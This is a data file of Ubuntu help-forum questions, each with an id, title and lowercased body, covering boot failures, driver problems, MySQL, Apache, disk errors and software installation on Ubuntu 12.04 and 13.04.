291472	enlisted maas nodes will not pxe boot for commissioning	i 'm wondering if any of you can assist with the issues i 'm facing with maas . i have a working maas server that is running dns and dhcp . i built the maas server on 13.04 server . i could n't get any of the nodes to enlist ( show up on the home page of maas ) with the 13.04 server disc . when i used 12.04 , they were enlisted . however , now that they are enlisted , i can not get them to commission . they will receive a dhcp response and ip address from the maas server and then they will try to boot to an image called pxelinux.cfg/xx-xx-xx-xx-xx-xx-xx where the x 's are a mac address . it just hangs there . i have attached a screenshot . can anyone assist ?
291477	what system tool is reporting this error and how to diagnose ?	in the last week , every time i turn my ubuntu ( 12.04 ) machine on , and sporadically throughout operation ( about every 1hr that i 'm actively using it ) , i get the following popup from the system : when i click the report problem ... button , it brings me to another dialog that asks me to put in my password : please enter your password to access problem reports of system programs i have yet to enter my password because i 'm a little sketched out . what 's going on here ? what logs could i look in to start troubleshooting ? thanks in advance !
291484	ubuntu 13.04 - no unity and no icons	i have a dual monitor config , and i tried to change one monitor to be portrait . somehow , that caused me to lose unity and all my icons entirely . i now just have 2 blank monitors . i managed to get a terminal going and launched firefox , so this is how i am posting this . how can i get unity back ? i really ca n't re-install . i tried unity reset-icons . that gives me this : compiz ( core ) - info : loading plugin : core compiz ( core ) - info : starting plugin : core unity-panel-service : no process found compiz ( core ) - info : loading plugin : reset-icons compiz ( core ) - error : failed to load plugin : reset-icons thanks for any help .
291486	problem while moving mysql db from windows to ubuntu ?	i was planning to move mysql db from windows to ubuntu . whenever i try to change lower_case_table_names to 1 ( for case insensitivity ) using set query it says it is read-only variable . when i tried updating the my.cnf file and restarted the service it showed no errors but the new config is not loaded . destination os : ubuntu 12.04 mysql : 5.5.22
291491	ubuntu 13.04 random boot	hi i 've installed ubuntu 13.04 and after installing nvidia drivers i 'm having real troubles getting into ubuntu . randomly it crashes before booting into unity ( login screen ? ) with random messages but mostly ending with something like this : nvidia license module nvidia taints kernel , and after that something like : failsafe kill process or so . sometimes it just ends up stuck and allows me to type stuff and if i press ctrl+alt+delete it responds but does n't restart only freezes with distorted flashing symbols and colours so i have to hard reset . at other times it just freezes until i reset pc . usually after 2-3 restarts it finally boots and everything works but i can not log out ( i 'm able to restart or shut down but not log out ) i had this problem with logging out when i was using ubuntu as wubi but now it 's worse since it is russian roulette if it even boots . i need nvidia drivers but since i tried 304 , 310 , 313 version and all cause the same trouble . using nvidia gt440 .
291492	toshiba r840 suspend hangs the laptop	fresh install on toshiba r840 . no other software installed . i put the laptop to suspend or the laptops goes to suspend mode after 10 minutes of inactivity . coming back from suspend , ubuntu tries to wake up the laptop , but the screen never comes on , and the laptop hangs . the only solution is hard reset . how to diagnose and fix the problem ? windows 7 works great when sleeping the laptop . thanks !
291493	vmware workstation 9 on ubuntu 12.04 network problems	i have been using vmware workstation 9 for about 3 months without any problems . a few days ago i started workstation and it prompted me that vmware had to compile modules and install them into the kernel . this has happened a few times before and there have never been any problems , but this time some module failed to compile/install . unfortunately i was too fast so i simply clicked `` ok '' which caused the dialog to close , and now i ca n't find any log file . next time i stated workstation it simply started as normal , but now when i boot up my virtual machine ( win7 pro 64 bit ) i get the error : `` could not connect ethernet0 to virtual network `` /dev/vmnet8 '' '' . so what i did was to check for updates ( vmware updates ) and found that i could download and install workstation 9.0.2 , which i did . now when i start my virtual machine i do n't get the error message but now it reports the network cable as unplugged . i have been searching for a solution for two days now and the only thing i can find is fixes for similar problems for workstation 8 . i do n't know what information you need , but the basic info is : thinkpad t430s 3.5.0-28-generic workstation 9.0.2 anyone have a clue of where i should start to look or what the problem might be ?
291495	cinnamon not installing in ubuntu 13.04	i have been trying to install cinnamon in my ubuntu 13.04 and when i give sudo apt-get install cinnamon i get the error as : some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : cinnamon : depends : libgjs0-libmozjs185-1.0 recommends : nemo but it is not going to be installed recommends : cinnamon-screensaver but it is not going to be installed e : unable to correct problems , you have held broken packages .
291496	ubuntu 13.04 - high temperature	i 've always used ubuntu . i installed the version ( 13.04 ) and i have a problem : the cpu 's temperature is high also in normal condition . this is the response of lm-sensors : acpitz-virtual-0 adapter : virtual device temp1 : +74.0°c coretemp-isa-0000 adapter : isa adapter core 0 : +69.0°c ( high = +90.0°c , crit = +90.0°c ) core 1 : +67.0°c ( high = +90.0°c , crit = +90.0°c ) is a problem of the kernel ? i have to wait a new version of the kernel ? or is a problem of my pc ? i have a `` hp pavilion dv6-1301el '' thank you all .
291500	install on usb external hard drive	i am new to ubuntu and i would like some help . i have a laptop with windows 7 installed but i would love to have ubuntu too because it 's a great os . so i would like to install ubuntu on an external usb hard drive ( 320 - 500 gb ) and i have some questions about that : do i need a usb external hard drive which will be compatible with ubuntu - linux ? or i can do it with any hard drive if i make a partition on it for ubuntu staff will i be able to use it and save other staff in the usb hard drive ( movies , songs , documents etc ) ? if i have ubuntu installed on the usb hard drive will i be able to boot ubuntu from any pc ? are my changes going to be saved normally or my settings will be lost after shut down ? waiting for your answers , if something is not explain well tell me to try explain it better . thank you !
291501	share a folder between two local users	i and my brother have user accounts on this machine , i want to share the documents director with him . is there a straight_forward way to do it . i am not a power user so please no scripts please , any way i can do this using nautilus i can download an app if i have to . i now this question will be marked duplicate , but really sorry.. no previous question provided a straightforward way . last time i just copied the contents to /home for both of us to use . no_scripts no symlinks creation please , something i can do in system settings would be appreciated
291503	ubuntu server replace windows 7 as my home server ?	i currently have a home server running windows 7 pro just so i can run my kids minecraft server and also a teamspeak server for online gaming . i would love to know if i can replace win7 with ubuntu or debian and still have the same result ? im not new to linux but have never run a linux server before so im no whizz on the cmd line any tips or ideas ? thanks
291505	files lost while installing 13.04 ?	i just installed ubuntu 13.04 . the problem is this . i had 2 partitions on my hard drive before , one for windows and program installations , and one for pure data . during the installation wizard , i chose to erase windows , not to have them both in my pc . but it seems that ubuntu also erased the other partition that was for pure data . am i wrong ? am i just looking in the wrong places for my files or are they erased ? please help , i 'm kinda freaked out , i had important/difficult to find stuff in there . thanks .
291506	when the full sdk will be available ?	i would be very interested to know when the full ubuntu sdk is going to be released . is there any preliminary schedule planned that could be published or is it still way too early stage ? or is there any other way to build some working version of ubuntu part for touch while waiting for the sdk ? like getting bits and pieces from here and there.. ?
291512	unable to add additional workspaces	i 'm using gnome-shell and i 'm unable to add additional workspaces . ( it is always set to 1 ) . distributor id : ubuntu description : ubuntu 11.04 release : 11.04 codename : natty has any one else had similar issue ?
291516	usb drive not consistently recognized in lubuntu . why ?	i have a lubuntu that i have downloaded from wubi.exe , and i have a very simple problem . most of the time , whenever i plug in my pendrive , or usb drive , which has a memory capacity of 32gb and of the make transcend , the file manager only recognizes it for a minute , and suddenly it says , `` not a valid block device '' . sometimes , it also says that there is no pen drive . even if i ca n't fix it , at least please tell me why such a thing happens . i 'm trying to transfer a 8.11gb folder to the pen drive . and sometimes it says it 's not possible . then if i try to delete anything it prevents me from doing so saying that the file is read-only i have checked all the permissions regarding the file , and it is all set to read and write . my kernel version is : linux ubuntu 3.2.0-23-generic # 36-ubuntu smp tue apr 10 20:39:51 utc 2012 x86_64 x86_64 x86_64 gnu/linux
291519	i have recently installed ubuntu 13.04 dual-booting with windows 7 , but ca n't login .	i installed ubuntu 13.04 after installing windows 7.installation was successful but it is n't booting while trying to start the system . system only starts windows 7 and no option for ubuntu . what is this so ? please help me .
291520	could up-arrow key in terminal is a risk when encrypting using 7z ?	we know that 7z can be used as an encryption method and that up-arrow key is used to see what commands and what tasks had done , so it can be use to reveal the password because in this case passwords are not hidden . like : 7z a -pmy_password it_mag.7z it_mag so if hackers or anyone can access my laptop they can open terminal and use up-arrow key to see passwords of my files . please help me solve this problem !
291524	compile fail . sdl problem	when i try to compile this program using make command , it fails . i think i have all the neccessary libraries for this . here is the screen shot of the trerminal with the compile fail . and here is a part of the readme file : < =============settup============= > to install the game , you will need the gnu gcc ( g++ ) compiler as well as the sdl library v1.2 or greater and sdl_image extension library ( for quicker and more versatile image loading ) and sdl_ttf ( for using true type fonts ) . after unpacking the archive , open up a terminal window , browse to the folder where you unpacked and type in `` make '' . the source files have now been compiled , and you can now run the program by typing ./invaders . what should i do ?
291525	nasty ubuntu problem , possibly a virus	i 'm not sure how much background to give . if it 's too much or too little , i 'll edit the post later . ( also , it seems that bug-report questions - possibly including this one - might not get answered here . if true , where should i post this ? ) i have ubuntu 12.10 set to dual-boot with windows xp . this morning , ubuntu hung badly . i could move the mouse , but i could n't do anything else . i had google chrome up when it hung ; i could n't click on my other tabs , i could n't click on anything on the dash ; it just did n't respond , it froze up . this has happened to me twice before ; the first time , i waited nearly half an hour , and it did n't unfreeze . so , i had to do a hard reboot , which worked both times . so i hard rebooted again - held the power button down till it turned off - and when i turned it back on , it did n't even get to the login screen . when i try to log into ubuntu , it flashes an underscore cursor on a command line of sorts for a while , and then the screen goes completely dead . even this one dead pixel in the middle of my screen turns off . it 's possible i have a virus , but it could also be some process that broke the computer when it hard rebooted . i can still log into windows - that 's where i 'm posting this from now - but i am so far out of my depth it 's not even funny . help !
291527	bandwidth management in ubuntu ?	i am doing my project on bandwidth control and management . so i am looking for good bandwidth management software in ubuntu . anyone can suggest me a best bandwidth management software for ubuntu , opensource ? a bandwidth management libary would be great . i am using 13.04 amd 64 bit desktop .
291532	unpacked a tar ... badly - now locked out of my own files !	not knowing well what i was doing , i opened a tar with sudo , and now it 's linked to a user that does n't exist and i ca n't remove it under any circumstances - perhaps because it 's off the home directory . help please ? total 44 drwx -- -- -- 2 3047 3047 4096 sep 25 2012 library drwx -- -- -- 2 3047 3047 4096 sep 25 2012 source drwx -- -- -- 2 3047 3047 4096 sep 25 2012 examples -rw-rw-rw- 1 q q 28828 may 6 07:02 image_processing.tar.gz
291536	version 12.04 or 13.04	i am new to both linux and ubuntu , never used it before . i 've noticed that there is two versions available to download on the official website . for a new user , is it recommended to go with the 13.04 version directly , or the 12.04 version that has `` extended support '' ? best regards confused first time user
291545	any music players with folder browsing for ubuntu ?	i am looking for a music player with folder browsing capabilities . i want the folder list on the left side and the all the music files on the right side . decible , amarok - ok they are fine , but i am seeing both the files and the folders on the left side . i do n't want that i need the folders on the left and when i click on the the files should be displayed on right . any player with the above feature ? ? ? and a small equalizer would be great to have along with it .
291547	is it possible to install the core apps on unity-next ?	i have installed unity-next on ubuntu 13.04 . now i want to try my apps and the core-apps on unity-next instead of a real device . thanks for answering !
291554	mono experimantal packages and apt-get	i have a slight problem trying to get the mono experimental 3.0.6 installed on ubuntu . i am quite unexperienced with ubuntu and apt-get so bear with me please . i come from this link : http : //www.meebey.net/posts/mono_3.0_preview_debian_ubuntu_packages/ where it says to add this to the /etc/apt/sources.list deb http : //debian.meebey.net/experimental/mono / which i did , then ran apt-get update . but when i try apt-get install mono-complete the installer complains that i have unsatisfied dependencies , all mentioning version 2.10.8 . now i can see in the repository that the dependencies listed are version 3.0.6 so i do n't know why apt-get is complaining and what should i need to do to let it get the packages all from that repo . thanks to anyone that can shed some light .
291555	frame rate counter	does any one knows if there is an application like frame fraps for ubuntu ? ? i found this commend and it almost worked winedebug=fps wine yourgame.exe 2 > & 1 | tee /dev/stderr | grep -- line-buffered `` ^trace : fps : '' | cut -c25-30 | osd_cat -- lines=1 -- font= '' lucidasanstypewriter-bold-18 '' -- color=yellow link but the problem with it was that it did not show on screen counter and i could not find the output file yes in terminal i could find fps counter throe bunch of errors but i would like to know if there is a better way and if there is not then how to get an output file with commend if any one knows thank you in advanced
291556	how can i get ubuntu 13.04 to work like it did before the kernel update to linux image 3.8.0.19.30 ?	i had successfully installed ubuntu 13.04 from a live usb by upgrading the previous version 12.10 . i dual boot ubuntu with windows . after installing linux image 3.8.0.19.30_i386.deb i was able to reboot the computer successfully only for the 1st time . however , on the next reboot there was a problem with the booting as it did not automatically boot to ubuntu 13.04 . it now gives an error message that kvm is disabled by bios . most importantly i am unable to power down the computer by the gui or by commands from the terminal . i have to do a physical reboot or physically cut the power by switching off the ups . ( error appended to this question ) . i can suspend the computer but can not reboot it . every time i click shutdown it goes to the 'log out ' screen . the system monitor shows that both the cores are running at around 80 % even when just idling . it used to usually run between 5 to 25 % for regular tasks . i can hear the fan whirring quite loudly ever since this problem started . now ubuntu 13.04 does not recognize the samsung monitor & has changed the resolution from 1440 x 900 to 1280 x 1024 . unity has become painfully slow . the external hdd is not being recognized . please help . would it be possible to run this os without a fresh install ? thanks . -- -- @ -- -- - : ~ $ sudo shutdown -h now [ sudo ] password for -- -- - : sudo : shutdown : command not found here is another error message that might help identify the problem : installarchives ( ) failed : perl : warning : setting locale failed . perl : warning : please check that your locale settings : language = ( unset ) , lc_all = ( unset ) , lang = `` en_in.iso8859-1 '' are supported and installed on your system . perl : warning : falling back to the standard locale ( `` c '' ) . locale : can not set lc_ctype to default locale : no such file or directory locale : can not set lc_messages to default locale : no such file or directory locale : can not set lc_all to default locale : no such file or directory preconfiguring packages ... perl : warning : setting locale failed . perl : warning : please check that your locale settings : language = ( unset ) , lc_all = ( unset ) , lang = `` en_in.iso8859-1 '' are supported and installed on your system . perl : warning : falling back to the standard locale ( `` c '' ) . locale : can not set lc_ctype to default locale : no such file or directory locale : can not set lc_messages to default locale : no such file or directory locale : can not set lc_all to default locale : no such file or directory preconfiguring packages ... perl : warning : setting locale failed . perl : warning : please check that your locale settings : language = ( unset ) , lc_all = ( unset ) , lang = `` en_in.iso8859-1 '' are supported and installed on your system . perl : warning : falling back to the standard locale ( `` c '' ) . locale : can not set lc_ctype to default locale : no such file or directory locale : can not set lc_messages to default locale : no such file or directory locale : can not set lc_all to default locale : no such file or directory preconfiguring packages ... perl : warning : setting locale failed . perl : warning : please check that your locale settings : language = ( unset ) , lc_all = ( unset ) , lang = `` en_in.iso8859-1 '' are supported and installed on your system . perl : warning : falling back to the standard locale ( `` c '' ) . locale : can not set lc_ctype to default locale : no such file or directory locale : can not set lc_messages to default locale : no such file or directory locale : can not set lc_all to default locale : no such file or directory preconfiguring packages ... dpkg : warning : 'start-stop-daemon ' not found in path or not executable dpkg : error : 1 expected program not found in path or not executable note : root 's path should usually contain /usr/local/sbin , /usr/sbin and /sbin error in function :
291557	working dockingstation for lenovo carbon x1	it seems as that the usb 3.0 docking station ( using a displaylink dl-3000 series chipset ) i got with my lenovo will not work any time soon . so i was hoping that somebody could give me advice on a proven/working chipset/working usb dockingstation ( or any other way/workaround ) . the goal should be to get 2 external displays running , since i want to use it at my workplace as a replacement for my ubuntu workstation pc .
291566	how to install qucs ( quite universal circuit software ) on ubuntu 13.04 ?	i am having troubles installing qucs , so this is all i have tried without positive results : it is not avilable software center there is no a debian package ppa : fransschreuder1/qucs is not working i hope you have a solution . thanks you guys : )
291567	why is 80gb hd read big error rate & smart data different and everything slow ?	load & run ok via usb stick ( real slow , jerkey ) , then installed ( 4th time now ) having problem . able to boot from 80 gb sata hd but everything still slow , jerkey , takes 1 second per charactor on dash . after several restarts , fails to boot at all . ( did install invidia 's driver though . ) performed clean install each time by itself . ( ran disk diag , benchmark crashes . smart data report is different than seagate 's smart data report , ( and long hd test via dos which passed no errors or bad sectors ) : ubuntu test had read error rate 89371540 , hardware ecc recovered 89371540 ! two bad sectors , but passed the hd ! thinking this is where my problem may be . must be something obvious i have to correct . learning the dash ! humbly request suggestion , thanks , holmzie
291568	ubuntu 13.04 server installation with no raid option ?	i 'm installing ubuntu 13.04 server . when i get to the partition manager , i select manual . when i click on one of my disks that i want to use as a raid partition , the option does n't exist . can you not create a raid in the ubuntu installation any more , or am i missing something ?
291569	unable to establish wifi connection	i have installed ubuntu today and i can not connect to my college wifi network . it is asking for bssid which i do n't know what it is . so please help me in establishing a connection .
291570	mark bad sectors on hard drive without formating	i 've noticed that on my home ubuntu server one drive is read only for some reason . digging up i found that this can happen when hard drives have errors . i used badblocks to check for errors , and indeed i have some damaged sectors . in most cases the only rational course of action is to try to backup data , remove the hdd and buy a new one . however , this server does n't have anything i already do n't have backed up on multiple places , and i 'd like to use it till it dies . i use it for streaming music and running some simple scripts . in any case , it would be a big fuss reinstalling everything . is there a way to mark these bad blocks without formatting a hdd ?
291571	touchscreen recognized , but not working in 13.04	first , let me mention that one of the first things i tested was the fact that the touchscreen was operating during the gui installation process . now that we 've established that ... after full installation , my touchscreen no longer works at all . i have a lenovo ideapad p400 touch . is there a generic-type driver loaded during the gui install that gets overwritten after updates/installation possibly ? i 'm not sure why it sees the device properly ( and apparently shows all proper 'statuses ' of the device properties ) , but does n't work in any way . here 's what i 'm sure you 're going to ask to see , and if i can offer any more details at all , please let me know : xinput list =========== ⎡ virtual core pointer id=2 [ master pointer ( 3 ) ] ⎜ ↳ virtual core xtest pointer id=4 [ slave pointer ( 2 ) ] ⎜ ↳ synps/2 synaptics touchpad id=12 [ slave pointer ( 2 ) ] ⎜ ↳ synaptics synaptics large touch screen id=14 [ slave pointer ( 2 ) ] ⎜ ↳ logitech usb optical mouse id=10 [ slave pointer ( 2 ) ] ⎣ virtual core keyboard id=3 [ master keyboard ( 2 ) ] ↳ virtual core xtest keyboard id=5 [ slave keyboard ( 3 ) ] ↳ power button id=6 [ slave keyboard ( 3 ) ] ↳ video bus id=7 [ slave keyboard ( 3 ) ] ↳ power button id=8 [ slave keyboard ( 3 ) ] ↳ lenovo easycamera id=9 [ slave keyboard ( 3 ) ] ↳ at translated set 2 keyboard id=11 [ slave keyboard ( 3 ) ] ↳ ideapad extra buttons id=13 [ slave keyboard ( 3 ) ] xinput list-props 14 ==================== device 'synaptics synaptics large touch screen ' : device enabled ( 133 ) : 1 coordinate transformation matrix ( 135 ) : 1.000000 , 0.000000 , 0.000000 , 0.000000 , 1.000000 , 0.000000 , 0.000000 , 0.000000 , 1.000000 device accel profile ( 261 ) : 0 device accel constant deceleration ( 262 ) : 1.000000 device accel adaptive deceleration ( 263 ) : 1.000000 device accel velocity scaling ( 264 ) : 10.000000 device product id ( 250 ) : 1739 , 7440 device node ( 251 ) : `` /dev/input/event12 '' evdev axis inversion ( 265 ) : 0 , 0 evdev axis calibration ( 266 ) : 0 , 3132 , 0 , 1777 evdev axes swap ( 267 ) : 0 axis labels ( 268 ) : `` abs mt position x '' ( 331 ) , `` abs mt position y '' ( 332 ) , `` none '' ( 0 ) , `` none '' ( 0 ) button labels ( 269 ) : `` button unknown '' ( 253 ) , `` button unknown '' ( 253 ) , `` button unknown '' ( 253 ) , `` button wheel up '' ( 139 ) , `` button wheel down '' ( 140 ) evdev middle button emulation ( 270 ) : 0 evdev middle button timeout ( 271 ) : 50 evdev third button emulation ( 272 ) : 0 evdev third button emulation timeout ( 273 ) : 1000 evdev third button emulation button ( 274 ) : 3 evdev third button emulation threshold ( 275 ) : 20 evdev wheel emulation ( 276 ) : 0 evdev wheel emulation axes ( 277 ) : 0 , 0 , 4 , 5 evdev wheel emulation inertia ( 278 ) : 10 evdev wheel emulation timeout ( 279 ) : 200 evdev wheel emulation button ( 280 ) : 4 evdev drag lock buttons ( 281 ) : 0 edit ( 13/05/14 ) : i 've definitely discovered that if i , at any point , put my system into any sort of suspension mode ( `` suspend '' the system ) , and then awaken it , the touchscreen will begin to work , whereas it was not functioning at all after a cold boot start earlier in the day . this , in my opinion , appears to point to some of the power functionality causing the problem , as if the drivers need to make a 'call ' to wake the device , despite having just been booted fresh . edit ( 13/05/16 ) : i 've submitted a bug report here : https : //bugs.launchpad.net/ubuntu/+source/xserver-xorg-input-evdev/+bug/1180881
291574	static linking to a library	i 'm trying to run a pre-compiled program from http : //cherrypit.princeton.edu/donev/packing/packlsd/instructions.html the pages states that : the executables only link in standard ( opengl , libtiff , libjpeg , etc . ) linux libraries , and link openglut statically , which may cause failures on some systems . the programs are compiled at medium optimization , for a generic ia32 processor , on a red hat el4 system . they should run on red hat ( > =9 ) and fedora ( > =3 ) systems just fine , and hopefully other similar distributions as well . a standard ubuntu 12.10 distribution is unable to run the program with ./packlsd.poly.static.x : error while loading shared libraries : libtiff.so.3 : can not open shared object file : no such file or directory this suggests that i should install the dev versions of libtiff , but neither sudo apt-get install libtiff4-dev sudo apt-get install libtiff5-dev seem to help . am i out of luck getting this program to work without help from the author ? edit : as requested . the output to sudo dpkg -l libtiff4 libtiff5 / . /usr /usr/lib /usr/lib/x86_64-linux-gnu /usr/lib/x86_64-linux-gnu/libtiff.so.4.3.6 /usr/share /usr/share/doc /usr/share/doc/libtiff4 /usr/share/doc/libtiff4/readme /usr/share/doc/libtiff4/todo /usr/share/doc/libtiff4/changelog.debian.gz /usr/share/doc/libtiff4/readme.debian /usr/share/doc/libtiff4/copyright /usr/share/lintian /usr/share/lintian/overrides /usr/share/lintian/overrides/libtiff4 /usr/lib/x86_64-linux-gnu/libtiff.so.4 / . /usr /usr/lib /usr/lib/x86_64-linux-gnu /usr/lib/x86_64-linux-gnu/libtiff.so.5.1.0 /usr/share /usr/share/doc /usr/share/doc/libtiff5 /usr/share/doc/libtiff5/readme /usr/share/doc/libtiff5/todo /usr/share/doc/libtiff5/changelog.debian.gz /usr/share/doc/libtiff5/readme.debian /usr/share/doc/libtiff5/copyright /usr/share/lintian /usr/share/lintian/overrides /usr/share/lintian/overrides/libtiff5 /usr/lib/x86_64-linux-gnu/libtiff.so.5
291577	restore clonezilla disk image to a disk of a different size	i use clonezilla at my school to save and restore disk ubuntu 12.04 and windows images over lan . when i try to restore an image to a computer with a disk whose size is not identical to the disk where the image was created , i can not restore the image , even though it would clearly fit and work on this disk ( i.e . restore a 7gb disk image from a 40gb disk to a 60gb disk ) . how can i force clonezilla to do this ?
291579	can jitsu deploy multiple service units like juju 's `` add-unit '' command ?	edit : the essence of this question is : can juju and/or jitsu do service co-location instead of having to use one node per service unit ? does jitsu have a way to specify more than one particular machine to deploy multiple service units ? for instance , i have ceph-mon deployed on three machines , but i want to deploy ceph-osd on the same three machines . as far as i can see , with jitsu i can only specify one machine for a particular service . so , after doing : jitsu deploy-to 1 -- config local.yaml local : ceph-osd i end up with : services : ceph : charm : local : precise/ceph-91 relations : mon : - ceph units : ceph/0 : agent-state : pending machine : 1 public-address : null ceph/1 : agent-state : pending machine : 2 public-address : null ceph/2 : agent-state : pending machine : 3 public-address : null ceph-osd : charm : local : precise/ceph-osd-7 relations : { } units : ceph-osd/3 : agent-state : pending machine : 1 public-address : null 2013-05-06 11:22:09,165 info 'status ' command finished successfully now it appears i have no way of adding ceph-osd service units to machines 2 and 3 . i would like to do something like add-unit and add in the other two machines . p.s . ca n't add it , but i suggest adding the tag `` jitsu '' to this board .
291585	bash script reading text file - no such file error	i 'm writing a script to read a simple text file . but i get only a `` no such file '' message . the file exist and has proper access rigths the code i 'm using is : ficheiro= '' mensagem '' while read linha ; do echo $ linha done < ficheiro
291592	how do i pxeboot all of ubuntu onto a computer without any i/o exept ethernet ( and keyboard ) while without an hd ?	i have an old vaio computer that was going to be thrown out because it has a faulty hard drive , and no i/o ports work except the ethernet ( and the keyboard ) . ( note : i know that it is possible to change the hd , but that is not my question ) what my goal is : to boot ubuntu onto the computer using pxeboot ( w/o any hd ) . i was able to boot the ubuntu installer by using tftp on my other windows computer using instructions that i found on google somewhere . this was good , however , the computer does not have a hard drive , so i can not install it there . what i am asking is : do any of you know how to boot the entire ubuntu os ( as you could with a usb dongle ) only using pxeboot over ethernet ? i only want ubuntu to run on the computer . i do not want it to be installed . thanks ahead of time .
291596	learning of mysql with java in ubuntu	hello as im new to ubuntu i want to learn mysql database with java , so how to install the software and configure them for the programming in ubuntu 13.04
291598	application lenses slow	as i said in title , application lenses are slow . when i click on application lens it takes around 10 seconds for applications to appear . it seems unity loads application list from hard drive every time i click on application lens . is there any way to make this faster ? btw every other part of system runs really fast .
291599	what license is the ubuntu colour pallete ?	i am developing some chrome app and started using ubuntu colours for it . the ones i found in the ubuntu colour palette . i assume it 's there and public so that app developers could create a consistent experience for ubuntu users . what about apps that do not aim at ubuntu users ? like in my case - a browser extension . is it legal to use these colours wherever i want or will it be considered a violation of a trademark/brand use ? i searched for terms of use of the colours but could n't find any . i just assume it is copyrighted as a part of a brand/trademark . p.s . i am an ubuntu user and , as i consider my self as a primary user for the extension , i wanted an ubuntu-like experience for myself . however , i am going to publish it so that more people could benefit from it and that 's where the problem comes from .
291607	blank screen at the beginning of the installation	i have been trying for some time now to get ubuntu working on my computer with proprietary nvidia drivers , having tried and failed many times decided to take a go at xubuntu . however i think i might have been messing around too much and now every time i try to reinstall ubuntu or xubuntu using a live pen , as soon as i press enter on `` install ubuntu '' ( or xubuntu ) the screen goes black and does nothing , but the computer remains on . is there a way to solve this without totally formatting everything ? i have intel integrated graphics + nvidia 650m . windows 8 installed in one hard drive and had ubuntu installed in a partition of a separate harddrive . i thought this might be leftovers from the ubuntu config so i tried to delete the partition and fixmbr and fixboot from windows command prompt . i know this is a mess of totally noob mistakes but i still want to try and get it fixed .
291608	ubuntu will not boot	i had ubuntu running on an acer easystore box . when the power supply got too loud , i decided to move the harddrive to a desktop box . however , when i tried to boot up , the screen tells me to pick a cd drive ( even though i set hard drive as the first option in the boot order in the bios settings ) . i luckily have an ubuntu cd so i was able to boot into that . one of the options there is to boot from hard disk and that works fine . so how do i get machine to boot from the hard disk ? potentially useful pieces of info : the desktop was purchased around 2007 . the easy store was purchased in 2011 . i suspect an issue with the partition table format ( mbr vs gpt ) but do n't know for sure if that 's the problem . here is the output of gdisk and parted : robarson @ mercenary : ~ $ sudo gdisk -l /dev/sda gpt fdisk ( gdisk ) version 0.8.1 partition table scan : mbr : protective bsd : not presen apm : not present gpt : present found valid gpt with protective mbr ; using gpt . disk /dev/sda : 3907029168 sectors , 1.8 tib logical sector size : 512 bytes disk identifier ( guid ) : 9f77ecbd-e11b-4245-b834-70e449bf4f3e partition table holds up to 128 entries first usable sector is 34 , last usable sector is 3907029134 partitions will be aligned on 2048-sector boundaries total free space is 2157 sectors ( 1.1 mib ) number start ( sector ) end ( sector ) size code name 1 2048 4095 1024.0 kib ef02 2 4096 3901030399 1.8 tib 0700 3 3901030400 3907028991 2.9 gib 8200 robarson @ mercenary : ~ $ sudo parted -l model : ata st32000542as ( scsi ) disk /dev/sda : 2000gb sector size ( logical/physical ) : 512b/512b partition table : gpt number start end size file system name flags 1 1049kb 2097kb 1049kb bios_grub 2 2097kb 1997gb 1997gb ext4 3 1997gb 2000gb 3071mb linux-swap ( v1 ) warning : unable to open /dev/sr0 read-write ( read-only file system ) . /dev/sr0 has been opened read-only . error : /dev/sr0 : unrecognised disk label
291618	how to make my windows software run on linux ?	i have a host of engine simulation softwares made by private factory racing team engineers but it is designed to work only on windows but i want to make it work on linux , how can i do so ? .
291620	work on localhost , on domain not working . connection timeout ?	website work on localhost:33333 but if i run my.domain.com:33333 or my.domain.com not working . ( connection timeout ) what could be the reason ? < virtualhost *:33333 > servername my.domain.com documentroot /var/www/vtigercrm/ errorlog /var/log/apache2/vtiger.my.domain.com.error_log customlog /var/log/apache2/vtiger.my.domain.com.access_log combined < directory /var/www/vtigercrm > options indexes followsymlinks multiviews allowoverride none order allow , deny allow from all < /directory > < /virtualhost > grep -ir listen /etc/apache2/ output : /etc/apache2/ports.conf : listen 33333 /etc/apache2/ports.conf : listen 443 /etc/apache2/ports.conf : listen 443 /etc/apache2/apache2.conf : # supposed to determine listening ports for incoming connections , and which /etc/apache2/apache2.conf : # include list of ports to listen on and which to use for name based vhosts /var/log/apache2/error.log [ mon may 06 19:27:17 2013 ] [ notice ] apache/2.2.22 ( ubuntu ) php/5.4.6-1ubuntu1.2 configured -- resuming normal operations [ mon may 06 19:41:52 2013 ] [ notice ] caught sigterm , shutting down [ mon may 06 19:41:53 2013 ] [ notice ] apache/2.2.22 ( ubuntu ) php/5.4.6-1ubuntu1.2 configured -- resuming normal operations iptables -l -nv : http : //wklej.org/hash/8f77aa0dbc6/
291626	unmounting drive in xubuntu	every time i try unmounting / ejecting / safely removing a drive in xubuntu , i get the following dialog : however , most of the time it seems like there is n't any data that needs to be written or a reason the device should n't be disconnected . is this dialog always displayed ? how can i differentiate between when this dialog is appropriate and when it is n't ?
291628	what version to use on dell insprion 1200 ?	i 've tried slacko 5.5 ( it works ) but i would like something better where i can use more easily the installing of various software and control of browser . ubuntu 12.04 and 13.04 will not load . i get an error message stating my cpu needs a different kernel , i am not highly knowable in programing and thus would like a user friendly os . currently using windows xp home .
291630	instant-on text file viewer	are there any basic text editors available that are just drop-dead simple , that allow me to instantly view the contents of a small text file ? gedit is nice , but it takes several seconds to start . i need something that is extreme bare-bones that does n't have to load a bunch of features that can pop up and show the contents in the blink of an eye . is there anything like that ? edit : i 'm looking for a gui application that i can use to open a file from nautilus .
291635	is there an application other than adobe digital edition that will work with the e-book .ascm format my library provides ?	the library provides a .ascm file for e-books . i need to get it into .epub format for my e-reader .
